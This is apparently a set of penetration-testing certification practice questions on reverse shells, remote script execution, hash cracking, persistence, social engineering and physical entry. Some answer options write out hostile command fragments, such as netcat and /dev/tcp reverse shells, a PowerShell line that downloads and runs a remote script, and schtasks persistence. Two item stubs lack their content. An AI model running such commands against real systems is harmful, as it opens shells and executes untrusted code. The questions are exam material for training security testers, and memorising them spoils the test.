HOTSPOT
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
Hot Area:
DRAG DROP
A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability that is a false positive.
Select and Place:
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester most likely use?
A. perl -e 'use SOCKET'; $i='
B. ssh superadmin@
C. nc -e /bin/sh
D. bash -i >& /dev/tcp/
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy
B. Execute a remote script
C. Run an encoded command
D. Instantiate an object
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
A. hashcat -m 5600 -r rules/best64.rule hash.txt wordlist.txt
B. hashcat -m 500 hash.txt
C. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a
D. hashcat -m 5600 -o results.txt hash.txt wordlist.txt
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
B. net session server | dsquery -user | net use c$
C. powershell && set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
A systems security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications?
A. Launch the applications and use dynamic software analysis tools, including fuzz testing.
B. Use a static code analyzer on the JAR files to look for code quality deficiencies.
C. Decompile the applications to approximate source code and then conduct a manual review.
D. Review the details and extensions of the certificate used to digitally sign the code and the application.
At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website. Which of the following approaches should the penetration tester take?
A. Run a spider scan in Burp Suite.
B. Use web aggregators such as BuiltWith and Netcraft
C. Run a web scraper and pull the website's content.
D. Use Nmap to fingerprint the website's technology.
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?
A. Update to the latest Microsoft Windows OS.
B. Put the machine behind the WAF.
C. Segment the machine from the main network.
D. Disconnect the machine.
When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?
A. Development of custom zero-day exploits and tools
B. Leveraging the dark net for non-attribution
C. Tenacity and efficacy of social engineering attacks
D. Amount of bandwidth available for DoS attacks
Given the following Python code:
a = 'abcdefghijklmnop'
a[::2]
Which of the following will result?
A. adgjmp
B. pnlhfdb
C. acegikmo
D. ab
A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?
A. Redirect the user with a CSRF.
B. Launch the website in an iFRAME.
C. Pull server headers.
D. Capture and replay a session ID.